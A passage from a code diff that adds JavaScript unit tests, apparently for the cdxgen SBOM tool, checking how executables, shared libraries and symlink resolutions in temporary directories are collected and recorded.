+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectExecutables() skips files already owned by OS packages", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-executables-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "bin"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "bin", "owned"), "#!/bin/sh\n");
+      writeFileSync(path.join(tempDir, "usr", "bin", "unowned"), "#!/bin/sh\n");
+      chmodSync(path.join(tempDir, "usr", "bin", "owned"), 0o755);
+      chmodSync(path.join(tempDir, "usr", "bin", "unowned"), 0o755);
+
+      const result = collectExecutables(
+        tempDir,
+        ["/usr/bin"],
+        ["/usr/bin/owned"],
+      );
+
+      assert.deepStrictEqual(result, ["usr/bin/unowned"]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectSharedLibs() preserves symlink alias entries while tracing resolutions", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-shared-libs-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "lib"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "lib", "libfoo.so.1"), "binary");
+      symlinkSync(
+        path.join(tempDir, "usr", "lib", "libfoo.so.1"),
+        path.join(tempDir, "usr", "lib", "libfoo.so"),
+      );
+
+      const result = collectSharedLibs(tempDir, ["/usr/lib"]);
+
+      assert.deepStrictEqual(result, [
+        "usr/lib/libfoo.so",
+        "usr/lib/libfoo.so.1",
+      ]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("collectSharedLibs() skips libraries already owned by OS packages", () => {
+    if (process.platform === "win32") {
+      return;
+    }
+    const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-shared-libs-"));
+    try {
+      mkdirSync(path.join(tempDir, "usr", "lib"), { recursive: true });
+      writeFileSync(path.join(tempDir, "usr", "lib", "libowned.so.1"), "owned");
+      writeFileSync(
+        path.join(tempDir, "usr", "lib", "libunowned.so.1"),
+        "unowned",
+      );
+
+      const result = collectSharedLibs(
+        tempDir,
+        ["/usr/lib"],
+        undefined,
+        undefined,
+        ["/usr/lib/libowned.so.1"],
+      );
+
+      assert.deepStrictEqual(result, ["usr/lib/libunowned.so.1"]);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it("recordSymlinkResolution() normalizes mixed path separators before comparing paths", () => {
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      const activity = recordSymlinkResolution(
+        "usr\\bin\\which",
+        "usr/bin/which",
+      );
+      assert.strictEqual(activity, undefined);
+      assert.deepStrictEqual(getRecordedActivities(), []);
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
+    }
+  });
+
+  it("recordSymlinkResolution() normalizes failed resolution paths without exposing trace detail", () => {
+    setDryRunMode(true);
+    resetRecordedActivities();
+    try {
+      recordSymlinkResolution("/tmp/root/usr/lib/libfoo.so", undefined, {
+        basePath: "/tmp/root",
+        errorCode: "ENOENT",
+        metadata: {
+          resolutionKind: "shared-library",
+        },
+        status: "failed",
+      });
+      const symlinkActivity = getRecordedActivities().find(
+        (activity) => activity.kind === "symlink-resolution",
+      );
+      assert.ok(symlinkActivity);
+      assert.strictEqual(symlinkActivity.target, "usr/lib/libfoo.so");
+      assert.strictEqual(symlinkActivity.errorCode, "ENOENT");
+      assert.strictEqual(symlinkActivity.traceDetail, undefined);
+      assert.strictEqual(symlinkActivity.resolvedPath, undefined);
+      assert.strictEqual(symlinkActivity.status, "failed");
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
+    }
+  });
 });